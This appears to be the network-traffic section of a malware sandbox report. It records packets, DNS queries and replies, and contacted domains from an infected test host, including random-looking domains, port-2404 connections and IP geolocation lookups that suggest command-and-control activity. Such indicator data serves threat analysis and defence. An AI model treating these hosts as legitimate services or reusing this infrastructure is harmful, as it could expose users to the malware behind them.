May 8, 2024 16:41:18.206967115 CEST  49743  443  192.168.2.4  65.108.69.93
May 8, 2024 16:41:18.209399939 CEST  49743  443  192.168.2.4  65.108.69.93
May 8, 2024 16:41:18.535414934 CEST  443  49743  65.108.69.93  192.168.2.4
May 8, 2024 16:41:18.535443068 CEST  443  49743  65.108.69.93  192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.535506010 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.535538912 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.535569906 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.535577059 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:18.535584927 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.535609961 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.535630941 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:18.535635948 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.535656929 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.535693884 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:18.535700083 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.535711050 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:18.535842896 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.535856962 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.535892963 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:18.535900116 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.535911083 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.535926104 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:18.535929918 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.535958052 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:18.535965919 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.535985947 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.535994053 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:18.536004066 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.536047935 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:18.536055088 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.538590908 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:18.864499092 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.864523888 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.864579916 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.864614964 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.864641905 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.864655972 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.864705086 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.864787102 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:18.864831924 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.865017891 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.865051031 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:18.865063906 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.865128040 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.865171909 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.865206003 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.865231991 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.865248919 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.865379095 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:18.865387917 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.865417957 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.865611076 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:18.872653961 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:18.932898998 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:18.932940960 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.932956934 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:18.932964087 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:19.199697971 CEST4974480192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:19.549418926 CEST8049744179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:19.549504042 CEST4974480192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:19.549710035 CEST4974480192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:19.549734116 CEST4974480192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:19.901177883 CEST8049744179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:20.656434059 CEST8049744179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:20.666542053 CEST8049744179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:20.666939020 CEST4974480192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:20.666991949 CEST4974480192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:20.671140909 CEST4974580192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:21.017755032 CEST8049744179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:21.026542902 CEST8049745179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:21.026655912 CEST4974580192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:21.026859999 CEST4974580192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:21.026881933 CEST4974580192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:21.386492014 CEST8049745179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:22.106245995 CEST8049745179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:22.115447998 CEST8049745179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:22.115533113 CEST4974580192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:22.115602970 CEST4974580192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:22.118336916 CEST4974780192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:22.468358994 CEST8049745179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:22.470484972 CEST8049747179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:22.470638037 CEST4974780192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:22.482662916 CEST4974780192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:22.482688904 CEST4974780192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:22.828958988 CEST8049747179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:23.576873064 CEST8049747179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:23.577550888 CEST8049747179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:23.577620983 CEST4974780192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:23.577882051 CEST4974780192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:23.590972900 CEST4974880192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:23.932233095 CEST8049747179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:23.944197893 CEST8049748179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:23.944437027 CEST4974880192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:23.944554090 CEST4974880192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:23.944581985 CEST4974880192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:24.296936989 CEST8049748179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:25.047538042 CEST8049748179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:25.052736998 CEST8049748179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:25.052798033 CEST4974880192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:25.052947998 CEST4974880192.168.2.4179.159.229.64
May 8, 2024 16:41:25.060220003 CEST | 49749 | 80 | 192.168.2.4 | 179.159.229.64
May 8, 2024 16:41:25.401262999 CEST | 80 | 49748 | 179.159.229.64 | 192.168.2.4
May 8, 2024 16:41:25.413958073 CEST | 80 | 49749 | 179.159.229.64 | 192.168.2.4
May 8, 2024 16:41:25.414033890 CEST | 49749 | 80 | 192.168.2.4 | 179.159.229.64
May 8, 2024 16:41:25.414324999 CEST | 49749 | 80 | 192.168.2.4 | 179.159.229.64
May 8, 2024 16:41:25.414350986 CEST | 49749 | 80 | 192.168.2.4 | 179.159.229.64
May 8, 2024 16:41:25.778088093 CEST | 80 | 49749 | 179.159.229.64 | 192.168.2.4
May 8, 2024 16:41:26.490622044 CEST | 80 | 49749 | 179.159.229.64 | 192.168.2.4
May 8, 2024 16:41:26.503127098 CEST | 80 | 49749 | 179.159.229.64 | 192.168.2.4
May 8, 2024 16:41:26.503185987 CEST | 49749 | 80 | 192.168.2.4 | 179.159.229.64
May 8, 2024 16:41:26.503226995 CEST | 49749 | 80 | 192.168.2.4 | 179.159.229.64
May 8, 2024 16:41:26.869178057 CEST | 80 | 49749 | 179.159.229.64 | 192.168.2.4
May 8, 2024 16:41:33.597908020 CEST | 49751 | 2404 | 192.168.2.4 | 193.149.176.178
May 8, 2024 16:41:33.811403990 CEST | 2404 | 49751 | 193.149.176.178 | 192.168.2.4
May 8, 2024 16:41:33.812333107 CEST | 49751 | 2404 | 192.168.2.4 | 193.149.176.178
May 8, 2024 16:41:33.817997932 CEST | 49751 | 2404 | 192.168.2.4 | 193.149.176.178
May 8, 2024 16:41:34.042567968 CEST | 2404 | 49751 | 193.149.176.178 | 192.168.2.4
May 8, 2024 16:41:34.281038046 CEST | 49751 | 2404 | 192.168.2.4 | 193.149.176.178
May 8, 2024 16:41:34.496082067 CEST | 2404 | 49751 | 193.149.176.178 | 192.168.2.4
May 8, 2024 16:41:34.501632929 CEST | 49751 | 2404 | 192.168.2.4 | 193.149.176.178
May 8, 2024 16:41:34.764916897 CEST | 2404 | 49751 | 193.149.176.178 | 192.168.2.4
May 8, 2024 16:41:34.764972925 CEST | 49751 | 2404 | 192.168.2.4 | 193.149.176.178
May 8, 2024 16:41:35.030664921 CEST | 2404 | 49751 | 193.149.176.178 | 192.168.2.4
May 8, 2024 16:41:35.103990078 CEST | 2404 | 49751 | 193.149.176.178 | 192.168.2.4
May 8, 2024 16:41:35.115662098 CEST | 49751 | 2404 | 192.168.2.4 | 193.149.176.178
May 8, 2024 16:41:35.329086065 CEST | 2404 | 49751 | 193.149.176.178 | 192.168.2.4
May 8, 2024 16:41:35.468539953 CEST | 49751 | 2404 | 192.168.2.4 | 193.149.176.178
May 8, 2024 16:41:35.687021017 CEST | 49752 | 80 | 192.168.2.4 | 178.237.33.50
May 8, 2024 16:41:35.689140081 CEST | 49753 | 80 | 192.168.2.4 | 178.237.33.50
May 8, 2024 16:41:35.988605976 CEST | 80 | 49752 | 178.237.33.50 | 192.168.2.4
May 8, 2024 16:41:35.988729000 CEST | 49752 | 80 | 192.168.2.4 | 178.237.33.50
May 8, 2024 16:41:35.990170002 CEST | 80 | 49753 | 178.237.33.50 | 192.168.2.4
May 8, 2024 16:41:35.990236044 CEST | 49753 | 80 | 192.168.2.4 | 178.237.33.50
May 8, 2024 16:41:36.030019999 CEST | 49752 | 80 | 192.168.2.4 | 178.237.33.50
May 8, 2024 16:41:36.341526985 CEST | 80 | 49752 | 178.237.33.50 | 192.168.2.4
May 8, 2024 16:41:36.341727018 CEST | 49752 | 80 | 192.168.2.4 | 178.237.33.50
May 8, 2024 16:41:36.387072086 CEST | 49751 | 2404 | 192.168.2.4 | 193.149.176.178
May 8, 2024 16:41:36.655478954 CEST | 2404 | 49751 | 193.149.176.178 | 192.168.2.4
May 8, 2024 16:41:37.008173943 CEST | 49754 | 80 | 192.168.2.4 | 208.95.112.1
May 8, 2024 16:41:37.173222065 CEST | 80 | 49754 | 208.95.112.1 | 192.168.2.4
May 8, 2024 16:41:37.173310041 CEST | 49754 | 80 | 192.168.2.4 | 208.95.112.1
May 8, 2024 16:41:37.173465967 CEST | 49754 | 80 | 192.168.2.4 | 208.95.112.1
May 8, 2024 16:41:37.336184025 CEST | 80 | 49754 | 208.95.112.1 | 192.168.2.4
May 8, 2024 16:41:37.336844921 CEST | 49754 | 80 | 192.168.2.4 | 208.95.112.1
May 8, 2024 16:41:37.342603922 CEST | 80 | 49752 | 178.237.33.50 | 192.168.2.4
May 8, 2024 16:41:37.342936039 CEST | 49752 | 80 | 192.168.2.4 | 178.237.33.50
May 8, 2024 16:41:37.503549099 CEST | 80 | 49754 | 208.95.112.1 | 192.168.2.4
May 8, 2024 16:41:37.503638029 CEST | 49754 | 80 | 192.168.2.4 | 208.95.112.1
May 8, 2024 16:41:41.289315939 CEST | 80 | 49753 | 178.237.33.50 | 192.168.2.4
May 8, 2024 16:41:41.289340019 CEST | 80 | 49753 | 178.237.33.50 | 192.168.2.4
May 8, 2024 16:41:41.289397955 CEST | 49753 | 80 | 192.168.2.4 | 178.237.33.50
May 8, 2024 16:42:04.506674051 CEST | 2404 | 49751 | 193.149.176.178 | 192.168.2.4
May 8, 2024 16:42:04.510014057 CEST | 49751 | 2404 | 192.168.2.4 | 193.149.176.178
May 8, 2024 16:42:04.767342091 CEST | 2404 | 49751 | 193.149.176.178 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 8, 2024 16:40:10.240375996 CEST | 53077 | 53 | 192.168.2.4 | 1.1.1.1
May 8, 2024 16:40:10.410495043 CEST | 53 | 53077 | 1.1.1.1 | 192.168.2.4
May 8, 2024 16:40:11.853027105 CEST | 50028 | 53 | 192.168.2.4 | 1.1.1.1
May 8, 2024 16:40:12.023823977 CEST | 53 | 50028 | 1.1.1.1 | 192.168.2.4
May 8, 2024 16:40:58.639718056 CEST | 52793 | 53 | 192.168.2.4 | 1.1.1.1
May 8, 2024 16:40:59.624875069 CEST | 52793 | 53 | 192.168.2.4 | 1.1.1.1
May 8, 2024 16:41:00.640481949 CEST | 52793 | 53 | 192.168.2.4 | 1.1.1.1
May 8, 2024 16:41:02.640734911 CEST | 52793 | 53 | 192.168.2.4 | 1.1.1.1
May 8, 2024 16:41:03.561168909 CEST | 53 | 52793 | 1.1.1.1 | 192.168.2.4
May 8, 2024 16:41:03.561192036 CEST | 53 | 52793 | 1.1.1.1 | 192.168.2.4
May 8, 2024 16:41:03.561422110 CEST | 53 | 52793 | 1.1.1.1 | 192.168.2.4
May 8, 2024 16:41:03.561502934 CEST | 53 | 52793 | 1.1.1.1 | 192.168.2.4
May 8, 2024 16:41:09.422688007 CEST | 57624 | 53 | 192.168.2.4 | 1.1.1.1
May 8, 2024 16:41:10.421741962 CEST | 57624 | 53 | 192.168.2.4 | 1.1.1.1
May 8, 2024 16:41:10.449239016 CEST | 53 | 57624 | 1.1.1.1 | 192.168.2.4
May 8, 2024 16:41:10.584939957 CEST | 53 | 57624 | 1.1.1.1 | 192.168.2.4
May 8, 2024 16:41:29.259946108 CEST | 51621 | 53 | 192.168.2.4 | 1.1.1.1
May 8, 2024 16:41:29.428303003 CEST | 53 | 51621 | 1.1.1.1 | 192.168.2.4
May 8, 2024 16:41:35.507747889 CEST | 60921 | 53 | 192.168.2.4 | 1.1.1.1
May 8, 2024 16:41:35.676626921 CEST | 53 | 60921 | 1.1.1.1 | 192.168.2.4
May 8, 2024 16:41:36.828860998 CEST | 53323 | 53 | 192.168.2.4 | 1.1.1.1
May 8, 2024 16:41:36.992717028 CEST | 53 | 53323 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 8, 2024 16:40:10.240375996 CEST | 192.168.2.4 | 1.1.1.1 | 0xad3 | Standard query (0) | 2no.co | A (IP address) | IN (0x0001) | false
May 8, 2024 16:40:11.853027105 CEST | 192.168.2.4 | 1.1.1.1 | 0x6365 | Standard query (0) | uqxOPcjzRTNSjLPJLsvEoGgENV.uqxOPcjzRTNSjLPJLsvEoGgENV | A (IP address) | IN (0x0001) | false
May 8, 2024 16:40:58.639718056 CEST | 192.168.2.4 | 1.1.1.1 | 0x8009 | Standard query (0) | cellc.org | A (IP address) | IN (0x0001) | false
May 8, 2024 16:40:59.624875069 CEST | 192.168.2.4 | 1.1.1.1 | 0x8009 | Standard query (0) | cellc.org | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:00.640481949 CEST | 192.168.2.4 | 1.1.1.1 | 0x8009 | Standard query (0) | cellc.org | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:02.640734911 CEST | 192.168.2.4 | 1.1.1.1 | 0x8009 | Standard query (0) | cellc.org | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:09.422688007 CEST | 192.168.2.4 | 1.1.1.1 | 0x8926 | Standard query (0) | makemoneyminds.com | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:10.421741962 CEST | 192.168.2.4 | 1.1.1.1 | 0x8926 | Standard query (0) | makemoneyminds.com | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:29.259946108 CEST | 192.168.2.4 | 1.1.1.1 | 0x8807 | Standard query (0) | blank-dvgxd.in | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:35.507747889 CEST | 192.168.2.4 | 1.1.1.1 | 0x3dca | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:36.828860998 CEST | 192.168.2.4 | 1.1.1.1 | 0xafc4 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 8, 2024 16:40:10.410495043 CEST | 1.1.1.1 | 192.168.2.4 | 0xad3 | No error (0) | 2no.co |  | 104.21.79.229 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:40:10.410495043 CEST | 1.1.1.1 | 192.168.2.4 | 0xad3 | No error (0) | 2no.co |  | 172.67.149.76 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:40:12.023823977 CEST | 1.1.1.1 | 192.168.2.4 | 0x6365 | Name error (3) | uqxOPcjzRTNSjLPJLsvEoGgENV.uqxOPcjzRTNSjLPJLsvEoGgENV | none | none | A (IP address) | IN (0x0001) | false
May 8, 2024 16:40:24.692898989 CEST | 1.1.1.1 | 192.168.2.4 | 0xf6d4 | No error (0) | au.c-0005.c-msedge.net | c-0005.c-dc-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
May 8, 2024 16:40:24.692898989 CEST | 1.1.1.1 | 192.168.2.4 | 0xf6d4 | No error (0) | c-0005.c-dc-msedge.net |  | 13.107.12.50 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:03.561168909 CEST | 1.1.1.1 | 192.168.2.4 | 0x8009 | No error (0) | cellc.org |  | 179.159.229.64 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:03.561168909 CEST | 1.1.1.1 | 192.168.2.4 | 0x8009 | No error (0) | cellc.org |  | 181.47.131.246 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:03.561168909 CEST | 1.1.1.1 | 192.168.2.4 | 0x8009 | No error (0) | cellc.org |  | 186.13.17.220 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:03.561168909 CEST | 1.1.1.1 | 192.168.2.4 | 0x8009 | No error (0) | cellc.org |  | 95.158.162.200 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:03.561168909 CEST | 1.1.1.1 | 192.168.2.4 | 0x8009 | No error (0) | cellc.org |  | 190.145.136.42 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:03.561168909 CEST | 1.1.1.1 | 192.168.2.4 | 0x8009 | No error (0) | cellc.org |  | 211.181.24.132 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:03.561168909 CEST | 1.1.1.1 | 192.168.2.4 | 0x8009 | No error (0) | cellc.org |  | 189.189.229.237 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:03.561168909 CEST | 1.1.1.1 | 192.168.2.4 | 0x8009 | No error (0) | cellc.org |  | 190.28.110.209 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:03.561168909 CEST | 1.1.1.1 | 192.168.2.4 | 0x8009 | No error (0) | cellc.org |  | 201.233.78.169 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:03.561168909 CEST | 1.1.1.1 | 192.168.2.4 | 0x8009 | No error (0) | cellc.org |  | 95.86.30.3 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:03.561192036 CEST | 1.1.1.1 | 192.168.2.4 | 0x8009 | No error (0) | cellc.org |  | 179.159.229.64 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:03.561192036 CEST | 1.1.1.1 | 192.168.2.4 | 0x8009 | No error (0) | cellc.org |  | 181.47.131.246 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:03.561192036 CEST | 1.1.1.1 | 192.168.2.4 | 0x8009 | No error (0) | cellc.org |  | 186.13.17.220 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:03.561192036 CEST | 1.1.1.1 | 192.168.2.4 | 0x8009 | No error (0) | cellc.org |  | 95.158.162.200 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:03.561192036 CEST | 1.1.1.1 | 192.168.2.4 | 0x8009 | No error (0) | cellc.org |  | 190.145.136.42 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:03.561192036 CEST | 1.1.1.1 | 192.168.2.4 | 0x8009 | No error (0) | cellc.org |  | 211.181.24.132 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:03.561192036 CEST | 1.1.1.1 | 192.168.2.4 | 0x8009 | No error (0) | cellc.org |  | 189.189.229.237 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:03.561192036 CEST | 1.1.1.1 | 192.168.2.4 | 0x8009 | No error (0) | cellc.org |  | 190.28.110.209 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:03.561192036 CEST | 1.1.1.1 | 192.168.2.4 | 0x8009 | No error (0) | cellc.org |  | 201.233.78.169 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:03.561192036 CEST | 1.1.1.1 | 192.168.2.4 | 0x8009 | No error (0) | cellc.org |  | 95.86.30.3 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:03.561422110 CEST | 1.1.1.1 | 192.168.2.4 | 0x8009 | No error (0) | cellc.org |  | 179.159.229.64 | A (IP address) | IN (0x0001) | false
May 8, 2024 16:41:03.561422110 CEST | 1.1.1.1 | 192.168.2.4 | 0x8009 | No error (0) | cellc.org |  | 181.47.131.246 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561422110 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org186.13.17.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561422110 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561422110 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org190.145.136.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561422110 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org211.181.24.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561422110 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org189.189.229.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561422110 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org190.28.110.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561422110 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org201.233.78.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561422110 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org95.86.30.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561502934 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org179.159.229.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561502934 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org181.47.131.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561502934 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org186.13.17.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561502934 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561502934 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org190.145.136.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561502934 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org211.181.24.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561502934 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org189.189.229.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561502934 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org190.28.110.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561502934 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org201.233.78.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561502934 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org95.86.30.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:10.449239016 CEST1.1.1.1192.168.2.40x8926No error (0)makemoneyminds.com65.108.69.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:10.584939957 CEST1.1.1.1192.168.2.40x8926No error (0)makemoneyminds.com65.108.69.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:29.428303003 CEST1.1.1.1192.168.2.40x8807Name error (3)blank-dvgxd.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:35.676626921 CEST1.1.1.1192.168.2.40x3dcaNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:36.992717028 CEST1.1.1.1192.168.2.40xafc4No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
• 2no.co
• makemoneyminds.com
• ywleoxljcxyhv.net
• cellc.org
• slmlafyecvd.com
• qiehbuqbrmnvwc.com
• orvskgrekvfetnl.net
• ayiplbxojpvv.org
• cqileharharpgfrs.com
• uyobkmevwtj.org
• cnojjwiexgft.net
• niqqkedjvbevod.org
• geoplugin.net
• ip-api.com
